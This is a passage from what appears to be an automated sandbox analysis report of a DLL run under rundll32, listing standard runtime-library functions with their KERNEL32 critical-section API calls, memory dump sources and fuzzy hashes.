                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 4100373531-0
                                                                                                          • Opcode ID: 97caa88e84ccd89aa93ae28ac998ff8c0d132747f048963a4391c92f1473f43e
                                                                                                          • Instruction ID: 796d6741741126c51599b2b906ad2ab7a2c15db3fbae67425d52538266fc70d6
                                                                                                          • Opcode Fuzzy Hash: 97caa88e84ccd89aa93ae28ac998ff8c0d132747f048963a4391c92f1473f43e
                                                                                                          • Instruction Fuzzy Hash: C38182B4A00209DFEB04CF94C981A9EB7B1FF88354F248559E819AB355D735EE82CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002A6AB, Relevance: 5.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
                                                                                                          • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
                                                                                                          • LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714
                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3253506028-0
                                                                                                          • Opcode ID: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
                                                                                                          • Instruction ID: 3062035623b9543bfb964b4a27d18fc4dd6f5ea10993a44c93a1de297aa0e807
                                                                                                          • Opcode Fuzzy Hash: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
                                                                                                          • Instruction Fuzzy Hash: 48F09672900355AFEB009F68DCCCB09B7AAFBD6261FDB0017F14486122DF3499C5CAA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002AC8F, Relevance: 5.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002AC9D
                                                                                                          • TlsGetValue.KERNEL32(100863C0,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACB1
                                                                                                          • LeaveCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACC7
                                                                                                          • LeaveCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACD2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$Leave$EnterValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 3969253408-0
                                                                                                          • Opcode ID: 635fa73827a5293bebe955a628cf46864b21247635245c70732137549ce58e55
                                                                                                          • Instruction ID: 611a8f73b53b00c56169e9f5a31810a1fff77d91dc8bf1d27f242dc0fd10bd82
                                                                                                          • Opcode Fuzzy Hash: 635fa73827a5293bebe955a628cf46864b21247635245c70732137549ce58e55
                                                                                                          • Instruction Fuzzy Hash: 42F054362005149FD3108F68DDC8C06B7ADFB8A2613664425E805D3221DA30F849EB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%